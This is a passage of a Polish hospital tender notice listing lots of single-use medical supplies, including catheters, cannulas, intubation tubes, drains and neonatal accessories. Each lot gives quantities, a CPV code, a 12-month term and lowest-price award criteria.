<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Wziernik ginekologiczny
S 82 x 24 mm	szt.	4800,
M 82 x 26,5 mm	szt.	7800,
L 82 x 33 mm	szt.	100,
2.	Szpatułka ginekologiczna do wymazów op	19,
3.	Szczoteczka  do wykonywania próbek cytologicznych, op	24, 
4.	Utrwalacz do preparatów cytologicznych 	pojemność 150-200 ml	szt.	38.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5 - Staplery do zespoleń jelitowych, zestawy drenażowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Stapler liniowy do zespoleń jelitowych	75 mm	szt	2
2.	Stapler liniowy do zespoleń jelitowych	90 mm	szt	2
3.	Stapler do zszycia skóry	 	op	12
4.	Zestawy drenażowe do klatki piersiowej	 	szt	36
5.	Zestaw drenażowy do klatki piersiowej dla noworodków	150 ml	szt.	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6 - Igły do znieczuleń, zestaw do kaniulacji, katetery*.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Igła do znieczuleń podpajęczynówkowych	22G/90	szt.	10
2.	Igła do znieczuleń podpajęczynówkowych	26G/90	szt.	1200
3.	Igła do znieczuleń podpajęczynówkowych	26G/130	szt.	10
4.	Igła do znieczuleń podpajęczynówkowych	18 G/ 90 	szt.	90
5.	Zestaw do kaniulacji dużych naczyń	5F/20	szt.	140
6.	Prowadnik stalowy 	J 0,35/60 cm	szt.	15
7.	Kateter do drenażu klatki piersiowej z troakarem	24F 	szt.	4
8.	Kateter do drenażu klatki piersiowej z troakarem	28F	szt.	16
9.	Zestaw drenażowy przezskórny z cewnikiem	9F/26	szt.	2
10.	Zestaw drenażowy przezskórny z cewnikiem	6F/26	szt.	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7 - Kaniule, kraniki, igły bezpieczne, igły do penów, zamknięte systemy*.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Igły do iniekcji	21 G 1 1/2 (0,8 x 40 mm)	szt	400
2.	Igły do iniekcji	20 G1 1/2(0,9 x 40mm)	szt	400
3.	Igły do iniekcji	22 G 1 1/4 (0,7 x 30mm)	szt	200
4.	Igły do iniekcji	25 G 1 (0,5 x25 mm)	szt	100
5.	Strzykawki wypełnione fizjologicznym roztworem soli 	3 ml	szt	150
6.	Igły do penów	8 mm x 0,30 mm  30G	szt	2000
7.	Kaniula obwodowa dożylna z  samodomykającym się portem bocznym 	16G	szt.	50
8.	Kaniula obwodowa dożylna z  samodomykającym się portem bocznym 	18 G	szt.	1350
9.	Kaniula obwodowa dożylna z  samodomykającym się portem bocznym 	20 G	szt.	8300
10.	Kaniula obwodowa dożylna z  samodomykającym się portem bocznym 	22 G	szt.	5800
11.	Kaniula obwodowa dożylna bez dodatkowego portu iniekcyjnego	26 G	szt.	250
12.	Kaniula dotętnicza	20G/1,1mm                                                                                                                                             x 45mm	szt.	75
13.	Bezpieczna kaniula obwodowa bez portu górnego	24G - 07x19 mm	szt.	20
14.	Kaniula obwodowa dożylna bez dodatkowego portu iniekcyjnego	24 G	szt.	1750
15.	Kranik trójdrożny	xxxxxxxxxxx	szt.	1800
16.	Rampa do infuzji z pięcioma kranikami 	 	szt.	125
17.	Korki do kaniuli	xxxxxxxxxxx	szt.	27800
18.	Kaniula obwodowa dożylna bezpieczna	18 G	szt.	2050
19.	Kaniula obwodowa dożylna bezpieczna	20 G	szt.	12850
20.	Kaniula obwodowa dożylna bezpieczna	22 G	szt.	5150
21.	Zamknięty system dostępu naczyniowego	 	szt	300
22.	Zamknięty system dostępu naczyniowego	 	szt	450.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 8 - Cewniki, maski tlenowe, elektrody do stymulacji serca, sonda*.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Cewnik do odsysania górnych dróg oddechowych, długość 33 cm	CH   4	szt.	25
   2.	Cewnik do odsysania górnych dróg oddechowych, długość 40 cm	CH 6 - CH 10	szt.	1100
3.	Cewnik do odsysania górnych dróg oddechowych, długość 60 cm	CH 12 - CH 20	szt.	15700
4.	Cewnik do żyły pępowinowej 	od F 4 do F 8	szt	10
5.	Cewnik  Foleya silikonowany, dwudrożny	CH 6	szt.	10
		CH   8	szt.	10
		CH  10	szt.	30
6.	Cewnik  Foleya dwudrożny z balonikiem	CH 12 - CH 22	szt.	4530
8.	 	CH  24	szt.	30
9.	Cewnik Nelaton długość 40 cm	CH 8 - CH 18	szt.	70
10.	Cewnik Pezzer silikonowany,	CH 30 	szt.	6
11.	Cewnik Tieman długość 40 cm	CH 10 - CH 18	szt.	120
12.	Kanka doodbytnicza 	CH 16	szt.	572
		CH  18	szt.	12
13.	Cewnik do podawania tlenu przez nos	2,1 m -2,2 m	szt.	1500
14.	Cewnik do karmienia noworodków przez nos,	CH4-CH8-CH6-CH10	szt.	480
15.	Cewnik do podawania tlenu przez nos - pediatryczny	 	szt.	15
16.	Maska do podawania tlenu dla dorosłych z drenem 	typ OS/10	szt.	2350
17.	Maska do podawania tlenu dla dzieci z drenem 	M	szt.	50
18.	Maska aerozolowa z nebulizatorem	 	szt.	140
19.	Nebulizator	 	szt.	10
20.	Maska aerozolowa z nebulizatorem	OS/8	szt.	1150
21.	Maska tlenowa  dla dorosłych z workiem	 	szt.	550
22.	Maska tlenowa  dla dzieci z workiem.	 	szt.	30
23.	Przestrzeń martwa	 	szt.	10
24.	Łącznik rozciągliwy ze złączem kątowym podwójnie obrotowym	 	szt.	850
25.	Sterylna sonda sengstakena do tamponady krwawienia z przełyku	CH18	szt.	12
26.	Zestaw  do konikotomii dla dorosłych 	 	szt	1
27.	Zestaw  do konikotomii dla dzieci	 	szt	1
28.	Zestaw  do konikopunkcji dla dzieci	 	szt	4
29.	Worek do dobowej zbiórki  moczu z odpływem (drenem)	 2 l	szt.	8150
30.	Worek do godzinowej zbiórki moczu	 2 l	szt.	21
31.	Zatyczka do cewnika uniwersalna	xxxxxxxxxxx	szt.	900
32.	Maska krtaniowa jednorazowego użytku do wentylacji noworodka	Nr 1	szt.	1
33.	Maska krtaniowa jednorazowego użytku do wentylacji pacjenta	Nr 2	szt.	2
		Nr 2 ?	szt.	2
		Nr 3	szt.	8
		Nr 4	szt.	17
		Nr 5	szt.	6
34.	Zestaw do przezskórnej endoskopowej gastrostomii PEG 	CH 18/40cm	szt.	4
35.	Filtr do wkłucia centralnego dla noworodków do żywienia pozajelitowego 	0,2 ?m, 1,2?m	szt.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet nr 9 - Rurki intubacyjne,  rurki tracheostomijne i ustno- gardłowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. 	Rurka intubacyjna z otworem Murphiego	Nr 2,5 	szt.	20
		Nr 3	szt.	20
		Nr 3,5 	szt.	30
2.	Rurka intubacyjna z otworem Murphiego i mankietem	Nr 4	szt.	10
		Nr 4,5	szt.	20
		Nr 5	szt.	10
		Nr 5,5	szt.	10
		Nr 6	szt.	30
		Nr 6,5	szt.	80
		Nr 7	szt.	270
		 Nr 7,5	szt.	360
		Nr 8	szt.	290
		Nr 8,5	szt.	70
		Nr 9	szt.	100
		Nr 9,5	szt.	10
3.	Rurka intubacyjna zbrojona z mankietem niskociśnieniowym	Nr 5,0	szt.	5
		Nr 5,5	szt.	5
		Nr 6,0	szt.	5
		Nr 6,5	szt.	5
		Nr 7	szt.	10
		Nr 7,5	szt.	10
		Nr 8	szt.	10
		Nr 8,5	szt.	10
		Nr 9	szt.	5
4.	Rurka tracheostomijna z  mankietem niskociśnieniowym	Nr  6	szt.	5
		Nr  6,5	szt.	5
		Nr  7,0	szt.	5
		Nr  7,5	szt.	10
		Nr  8,0	szt.	15
		Nr  8,5	szt.	5
		Nr  9,0	szt.	5
5.	Rurka Guedala	Nr 0 0 0 	szt.	2
		Nr 0 0	szt.	6
		Nr 0	szt.	6
		Nr  1	szt.	12
		Nr  2	szt.	44
		Nr  3	szt.	123
		Nr  4	szt.	153
		Nr  5	szt.	6
6.	Prowadnica do rurek intubacyjnych	rozmiar 4,0 i  5,0	szt.	30
7.	Uchwyt Thomas tube holder	 	szt	83
8.	Tasiemka  mocująca	 	szt.	110.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet nr 10 - Dreny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Dren brzuszny, silikonowy	22F, 24F, 26F, 27F, 28F, 30F, 32F	szt.	100
2.	Dren  T-Kehr	CH12, CH14, CH16, CH18, CH20, CH22	szt.	31
3.	Kateter do odsysania ran z otworami bocznymi	CH12, CH14, CH16, CH18, CH20, CH22	szt.	810
4.	Dren do embolektomii Fogartyego,	5F/80	szt.	4
5.	Dren tlenowy łączący	210 cm	szt.	500
6.	Dren do końcówek do odsysania 	7,0/10,0	mb	1050
7.	Zgłębnik żołądkowy - 80cm	CH 14	szt.	2
		CH 16	szt.	20
		CH 18	szt.	100
		CH 20	szt.	243
		CH 22	szt.	303
		CH 24	szt.	156
		CH 26	szt.	53
		CH 28	szt.	49
		CH 30	szt.	20
		CH 32	szt.	2
		CH 6	szt.	2
		CH 8	szt.	2
		CH 10	szt.	2
		CH 12	szt.	2
8.	Zgłębnik żołądkowy - 125 cm	CH 16-CH 22	szt.	8
9.	Butelka Redona do odsysania  ran 	200 ml	szt.	930
		400 ml	szt.	386
10.	Dren do odsysania pola operacyjnego z zakrzywioną końcówką, z kontrolą siły ssania	 CH -24   min. 200cm	szt.	117
11.	Dren do odsysania pola operacyjnego z zakrzywioną końcówką	 CH-24   min. 200cm	szt.	765
12.	Worek do zbiórki żółci sterylny	350 ml	szt.	55.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet nr 11 - Ostrza, elektrody oraz inny  sprzęt jednorazowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Ostrza wymienne do skalpeli 	Nr 10	op.	50
		Nr 11	op.	7
		Nr 15	op.	4
		Nr 20	op.	32
		Nr 22	op.	9
		Nr 22A	op.	1
		Nr 23	op.	1
2.	Ostrza chirurgiczne z trzonkiem	Nr 10	op.	71
		Nr 11	op.	11
		Nr 15	op.	75
		Nr 20	op.	42
3.	Przedłużacz do pomp infuzyjnych z jasnym przewodem	       1,5 m	szt.	2020
4.	Przedłużacz do pompinfuzyjnych z ciemnym przewodem	       1,5 m	szt.	885
5.	Komlet elektrod do stymulacji	 	kpl.	10
6.	Elektroda do czasowej stymulacji serca 	6F	szt.	2
7.	Zestaw do punkcji jamy opłucnowej 	80 cm	szt	7
8.	Introduktor - zestaw z zastawką do wprowadzania kateterów 	8F	szt.	2
9.	Zestaw do lewatywy	xxxxxxxxxxx	szt.	900
10.	Zaciskacz do pępowiny	xxxxxxxxxxx	szt.	1150
11.	Wieszak do worków na mocz 	xxxxxxxxxxx	szt.	450
12.	Sterylny woreczek na mocz dla chłopców, 	100 -120 ml	szt.	600
13.	Sterylny woreczek na mocz dla  dziewczynek, 	100 -120 ml	szt.	600
14.	Łącznik do kontroli odsysania - Fingertip 	 	szt.	800
15.	Przyrząd do pobierania (upustu) krwi z pojemnikiem 	 	szt.	16
16.	Zestaw do wlewów kontrastowych kolografii bez barytu	 	szt.	30
17.	Zestaw do wlewów kontrastowych kolografii z barytem	 	szt.	4
18.	Elektrody do EKG	xxxxxxxxxxx	szt.	34940
19.	Elektrody do EKG pediatryczne -	22-33 mm   22-22 mm	szt.	50
20.	Elektrody do EKG -  dla noworodka.	 	szt.	100
21.	Jednorazowe mankiety noworodkowe 	   rozmiar 2 - obwód ramienia 4,3 do 8,0 cm romiar 3 - obwód ramienia 5,8 do 10,9 cm.	szt.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet nr 12 - Zestaw do tracheostomii przezskórnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zestaw do tracheostomii przezskórnej  7,0 mm,	szt.	1
2.	Zestaw do tracheostomii przezskórnej  8,0 mm, 	szt.	2
3.	Zestaw do tracheostomii przezskórnej  7,0 mm PEAN, 	szt.	1
4.	Zestaw do znieczulenia zewnątrzoponowego 	szt	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet nr 13 - Kapturki ochronne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Kapturki ochronne do termometrów 	 	op.	1540
2.	Wziernik uszny do otoskopu ok.4 mm 	ok. 4 mm	szt	600
3.	Wziernik uszny  do otoskopu ok.2,5 mm 	ok. 2,5 mm	szt	1 400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet nr 14 - Worki stomijne, pasta i puder.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Pasta  stosowana w zmianach skórnych wokół stomii 	60 g	szt. 	30
2.	Puder 	25 g	szt. 	5
3.	Worki stomijne jednoczęściowe przeźroczyste	 	szt. 	300
4.	Worki stomijne jednoczęściowe  beżowe 	 	szt. 	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet nr 15 - Zestaw do pomp, wapno granulowane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zestaw uniwersalny do pomp do emulsji tłuszczowych 	 	szt. 	1000
2.	Wapno granulowane 	 	szt	8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet nr 16 - Filtry, sztuczny nos, obwody anestezjologiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Filtry antybakteryjne i antywirusowe, mechaniczne, z harmonijkową membraną filtrującą 	szt.	1525
2.	Filtry antybakteryjne i antywirusowe, mechaniczne	szt.	1725
3.	Filtr oddechowy dla noworodka 	szt.	25
4.	Urządzenie oddechowe HME sztuczny nos dla pacjentów po tracheostomii  	szt.	1175
5.	Obwód anestezjologiczny z workiem	szt.	400
6.	Rozciągliwy obwód oddechowy	szt.	190.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet nr 17 - Klipsy do klipsownicy, filtry do duomatu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Filtr do duomatu do laparoskopu 	 	szt.	100
2.	Klipsy do klipsownicy 	 	op.	32.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Pakiet nr 18 - Troakary do laparoskopii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Troakar nożowy jednorazowego użytku 	5 mm x 150 mm	szt.	6
2.	Troakar nożowy jednorazowego użytku, 	12 mm x 15 mm	szt.	18
3.	Troakar jednorazowego użytku w wersji separatora optycznego 	15 mm x 150 mm	szt.	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Pakiet nr 19 - Maski ochronne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Maska ochronna dla personelu 	 	szt.	22.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Pakiet nr 20 - Akcesoria do fototerapii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Okularki ochronne do fototerapii noworodków	obwód głowy 20 - 28 cm / Noworodki/	szt.	70
		obwód głowy 30 -38 cm  / Noworodki/	szt.	110
		obwód głowy                   24 -33 cm  /Wcześniaki /	szt.	240
2.	Prześcieradełko do łóżeczka do fototerapii	 	szt.	50
3.	Materacyk do łóżeczka do fototerapii	 	szt.	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Pakiet nr 21 - Akcesoria do fototerapii, dezynfekcji parowej oraz do podawania pokarmu niemowlętom.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Kombinezon  do fototerapii 	 	szt.	5
2.	Kombinezon  do fototerapii 	 	szt.	1
3.	Torebka do przeprowadzenia dezynfekcji parowej  w kuchence mikrofalowej, 	x	szt.	40
4.	Kubeczek do podawania pokarmu niemowlęciu 	 	szt.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Pakiet nr 22 - Mikrokuwety.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Mikrokuwety do pomiaru glucozy 			op.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Pakiet nr 23 - Test do wykrywania Helicobacter pyroli.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Test do wykrywania Helicobacter pyroli		szt.	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Pakiet nr 24 - Produkty medyczne jednorazowego użytku do laparoskopii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Woreczki na preparat 	 	szt	17
2.	Igła VERESSA, 	 	szt	70.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Pakiet nr 25 - Paski wskaźnikowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Paski wskaźnikowe pH		op.	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Pakiet nr 26 - Ustniki, głowica.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Jednorazowy ustnik do spirometrów i pneumodozymetrów	 	szt.	50
2.	Głowica łącznik do pneumotachografu do spirometru 	 	szt.	10
3.	Ustnik do spirometru 	 	szt.	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Pakiet nr 27-System ssący.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Wkład workowy jednorazowego użytku	pojemność 1000ml	szt.	1368
2.	Wkład workowy jednorazowego użytku	pojemność 2000ml	szt.	1584
3.	Kanister 	pojemność 1000ml	szt.	2
		pojemność 2000ml	szt.	2
4.	Torba na wymiociny 	pojemność 1500ml	szt.	5040
5.	Mocownik szynowy	 	szt.	2
6.	Łącznik zwężany	 	szt.	2
7.	Żel pakowany w wiaderko,	poj. 2 kg	op	42.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Pakiet nr 28 - Łyżki sterylne jednorazowego użytku do laryngoskopów światłowodowych i standartowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Łyżki optyczne typ Macintosh - światłowód	2	szt	10
		3	szt	97
		4	szt	92
2.	Łyżki Typ Miller -światłowód 	0 0	szt	2
		0	szt	20
		1	szt	14
		2	szt	1
3.	Łyżki Typ Macintosh /  standard	2	szt	2
		3	szt	55
		4	szt	43
4.	Łyżki Typ Miller -standard	0	szt	4
		1	szt	9
		2	szt	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Pakiet nr 29 - Akcesoria pomocnicze do nCPAP Infant Flow.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Jednorazowy układ oddechowy	 	szt	20
2.	Jednorazowy układ oddechowy (Generator posiadający 4 dysze)	 	szt	5
3.	Maseczka nosowa jednorazowa	 	szt	3
4.	Maseczka nosowa,	 	szt	3
5.	Czapeczka 	 	szt	5
6.	Czapeczka 	 	szt	5
7.	Mocowanie paskowe generatora 	 	szt	5
8.	Mocowanie do czujnika temperatury dla noworodków, 	 	szt	50
9.	Komora nawilżacza z automatycznym napełnianiem wodą	 	szt	20
10.	Filtr bakteriobójczy i wyciszający 	 	szt	10
11.	Jednorazowy dren dla noworodka z zastawką PEEP 	 	szt	15
12.	Filtr powietrza	11cm x 11cm	szt	3
13.	Filtr powietrza  F -4E 	51cm x 17cm	szt	3
14.	Filtr powietrza F-6E	23,5cm x 15,5cm	szt	6
15.	Materacyk do inkubatora	 	szt	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> Pakiet nr 30 -  Wkłady do strzykawki automatycznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Wkłady do strzykawki automatycznej 	Wkłady do strzykawki automatycznej do kontrastu w 100% kompatybilne z wstrzykiwaczem Medrad VISTRON CT; jałowe	poj. 200 ml	szt	1 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> Pakiet nr 31 - Materiały okulistyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Uniwersalna osłonka na oko-przeźroczysta plastikowa	ok.6,5 x 7,5 cm	szt	350
2.	Gąbka oczna	długość 7 cm , dł. samej gąbki ok.17 mm 	szt.	300
3.	Paski sączki odpływowe	15 cm - 9,5 cm x 3 mm - 4 mm	szt.	320
4.	Kapturki do tonopenu 	 	szt.	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 32 <b>NAZWA:</b> Pakiet nr 32 - Układ oddechowy dla noworodka.</p>
